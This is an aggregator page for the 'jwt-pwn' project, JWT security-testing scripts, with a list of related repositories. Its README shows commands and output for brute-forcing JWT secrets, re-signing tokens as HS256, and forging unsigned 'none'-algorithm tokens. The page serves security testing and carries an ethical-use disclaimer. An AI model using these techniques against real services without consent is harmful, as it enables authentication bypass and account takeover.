mazen160 / Jwt Pwn
Licence: mit
Security Testing Scripts for JWT
Stars: ✭ 170
Programming Languages
python
139335 projects - #7 most used programming language
Labels
Projects that are alternatives of or similar to Jwt Pwn
Minesweeper
A Burpsuite plugin (BApp) to aid in the detection of scripts being loaded from over 23000 malicious cryptocurrency mining domains (cryptojacking).
Stars: ✭ 162 (-4.71%)
Mutual labels: web-security
Hacker101
Source code for Hacker101.com - a free online web and mobile security class.
Stars: ✭ 12,246 (+7103.53%)
Mutual labels: web-security
Security.identity
.NET DevPack Identity is a set of common implementations to help you implementing Identity, Jwt, claims validation and another facilities
Stars: ✭ 165 (-2.94%)
Mutual labels: jwt
Spark Pac4j
Security library for Sparkjava: OAuth, CAS, SAML, OpenID Connect, LDAP, JWT...
Stars: ✭ 154 (-9.41%)
Mutual labels: jwt
Bbrecon
Python library and CLI for the Bug Bounty Recon API
Stars: ✭ 169 (-0.59%)
Mutual labels: web-security
Django Jwt Auth
JSON Web Token Authentication support for Django
Stars: ✭ 160 (-5.88%)
Mutual labels: jwt
Spring Boot Security Jwt Spa
Spring Boot 2 + JWT + Spring Security 5的单页应用(SPA) Restful 解决方案
Stars: ✭ 166 (-2.35%)
Mutual labels: jwt
Spring Boot Examples
个人学习 SpringBoot2.x 写的一些示例程序,目前正在持续更新中.....
Stars: ✭ 159 (-6.47%)
Mutual labels: jwt
Flask Restless Security
Concise skeleton for development of Flask, Flask-Restless, SQLAlchemy, JWT based REST APIs.
Stars: ✭ 159 (-6.47%)
Mutual labels: jwt
Cakephp Jwt Auth
A CakePHP plugin for authenticating using JSON Web Tokens
Stars: ✭ 153 (-10%)
Mutual labels: jwt
Pac4j
Security engine for Java (authentication, authorization, multi frameworks): OAuth, CAS, SAML, OpenID Connect, LDAP, JWT...
Stars: ✭ 2,097 (+1133.53%)
Mutual labels: jwt
Cs253.stanford.edu
CS 253 Web Security course at Stanford University
Stars: ✭ 155 (-8.82%)
Mutual labels: web-security
Branca Spec
Authenticated and encrypted API tokens using modern crypto
Stars: ✭ 163 (-4.12%)
Mutual labels: jwt
Bunkerized Nginx
🛡️ Make your web services secure by default !
Stars: ✭ 2,361 (+1288.82%)
Mutual labels: web-security
Liugh Parent
SpringBoot+SpringCloud Oauth2+JWT+MybatisPlus实现Restful快速开发后端脚手架
Stars: ✭ 2,112 (+1142.35%)
Mutual labels: jwt
Cognito Express
Authenticates API requests on a Node application by verifying the JWT signature of AccessToken or IDToken generated by Amazon Cognito.
Stars: ✭ 165 (-2.94%)
Mutual labels: jwt
jwt-pwn
Security Testing Scripts for JWT
jwt-cracker.py
JWT password/secret cracker.
$python3 jwt-cracker.py -jwt "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJqd3QiOiJwd24ifQ.4pOAm1W4SHUoOgSrc8D-J1YqLEv9ypAApz27nfYP5L4" -t 10 -w /pentest/wordlist.txt
[info] Loaded wordlist.
[info] starting brute-forcing.
[#] KEY FOUND: 1234
go-jwt-cracker
JWT password/secret cracker that is much faster.
$ cd go-jwt-cracker
$ go get
$ go build # Building the binary.
$ ./go-jwt-cracker -wordlist /pentest/wordlist.txt -token "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJqd3QiOiJwd24ifQ.4pOAm1W4SHUoOgSrc8D-J1YqLEv9ypAApz27nfYP5L4"
[+] Key Found: 1234
jwt-decoder.py
Decodes the value of JWT.
$ python3 jwt-decoder.py "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJqd3QiOiJwd24ifQ.4pOAm1W4SHUoOgSrc8D-J1
YqLEv9ypAApz27nfYP5L4"
[#] JWT Header:
{"alg": "HS256", "typ": "JWT"}
[#] JWT Value:
{"jwt": "pwn"}
jwt-any-to-hs256.py
Generates a new JWT that is signed with HS256 with the same payload value of a provided JWT.
python3 jwt-any-to-hs256.py "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJqd3QiOiJwd24ifQ.4pOAm1W4SHUoOgSrc
8D-J1YqLEv9ypAApz27nfYP5L4"
[#] Generated JWT:
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJqd3QiOiJwd24ifQ.WqY6R5zmscIx_6ZFwSASHZ_1zbqih_IdtLv_S2Pj028
jwt-mimicker.py
Generates a new unsigned JWT with the same payload value of a provided JWT.
python3 jwt-mimicker.py "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJqd3QiOiJwd24ifQ.4pOAm1W4SHUoOgSrc8D-J
1YqLEv9ypAApz27nfYP5L4"
[#] Generated unsigned JWT:
eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJqd3QiOiJwd24ifQ.
Requirements
- Python2 or Python3
- pyjwt
Legal Disclaimer
This project is made for educational and ethical testing purposes only. Usage of jwt-pwn for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.
License
The project is licensed under MIT License.
Author
Mazin Ahmed
- Website: https://mazinahmed.net
- Email: mazin AT mazinahmed DOT net
- Twitter: https://twitter.com/mazen160
- Linkedin: http://linkedin.com/in/infosecmazinahmed
Note that the project description data, including the texts, logos, images, and/or trademarks,
for each open source project belongs to its rightful owner.
If you wish to add or remove any projects, please contact us at [email protected].